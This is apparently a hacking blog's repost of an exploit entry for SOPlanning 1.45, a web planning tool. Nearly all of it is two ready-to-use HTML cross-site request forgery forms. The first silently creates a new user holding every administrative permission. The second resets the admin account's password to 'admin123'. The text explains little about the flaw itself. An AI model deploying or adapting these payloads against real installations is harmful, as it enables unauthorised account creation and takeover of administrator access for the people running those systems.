Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86383009

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling

# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary 
# user creation and for changing passwords (Specifically the admin password)

# POC For aribtrary user creation:
# CSRF POC:


<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="1" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

# POC for admin password change:

# CSRF POC:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormProfil" />
<input type="hidden" name="xajaxr" value="1581702103306" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="fr" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>